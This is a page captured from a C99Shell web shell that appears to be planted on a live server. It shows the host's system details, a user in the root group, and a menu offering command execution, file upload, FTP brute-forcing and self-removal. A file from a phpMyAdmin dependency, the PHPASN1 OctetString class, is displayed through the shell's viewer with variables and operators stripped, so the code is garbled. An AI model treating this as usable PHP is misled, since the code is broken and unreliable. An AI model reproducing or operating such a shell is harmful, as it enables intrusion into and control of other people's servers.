!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/public_html/phpmyadmin/vendor/fgrosse/phpasn1/lib/ASN1/Universal/   drwxr-xr-x
Free 28.21 GB of 117.98 GB (23.91%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     OctetString.php (2.26 KB)      -rwxr-x---
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/*
 * This file is part of the PHPASN1 library.
 *
 * Copyright © Friedrich Große <friedrich.grosse@gmail.com>
 *
 * For the full copyright and license information, please view the LICENSE
 * file that was distributed with this source code.
 */

namespace FG\ASN1\Universal;

use 
Exception;
use 
FG\ASN1\ASNObject;
use 
FG\ASN1\Parsable;
use 
FG\ASN1\Identifier;

class 
OctetString extends ASNObject implements Parsable
{
    protected 
$value;

    public function 
__construct($value)
    {
        if (
is_string($value)) {
            
// remove gaps between hex digits
            
$value preg_replace('/\s|0x/'''$value);
        } elseif (
is_numeric($value)) {
            
$value dechex($value);
        } elseif (
$value === null) {
            return;
        } else {
            throw new 
Exception('OctetString: unrecognized input type!');
        }

        if (
strlen($value) % != 0) {
            
// transform values like 1F2 to 01F2
            
$value '0'.$value;
        }

        
$this->value $value;
    }

    public function 
getType()
    {
        return 
Identifier::OCTETSTRING;
    }

    protected function 
calculateContentLength()
    {
        return 
strlen($this->value) / 2;
    }

    protected function 
getEncodedValue()
    {
        
$value $this->value;
        
$result '';

        
//Actual content
        
while (strlen($value) >= 2) {
            
// get the hex value byte by byte from the string and and add it to binary result
            
$result .= chr(hexdec(substr($value02)));
            
$value substr($value2);
        }

        return 
$result;
    }

    public function 
getContent()
    {
        return 
strtoupper($this->value);
    }

    public function 
getBinaryContent()
    {
        return 
$this->getEncodedValue();
    }

    public static function 
fromBinary(&$binaryData, &$offsetIndex 0)
    {
        
self::parseIdentifier($binaryData[$offsetIndex], Identifier::OCTETSTRING$offsetIndex++);
        
$contentLength self::parseContentLength($binaryData$offsetIndex);

        
$value substr($binaryData$offsetIndex$contentLength);
        
$offsetIndex += $contentLength;

        
$parsedObject = new self(bin2hex($value));
        
$parsedObject->setContentLength($contentLength);

        return 
$parsedObject;
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0036 ]--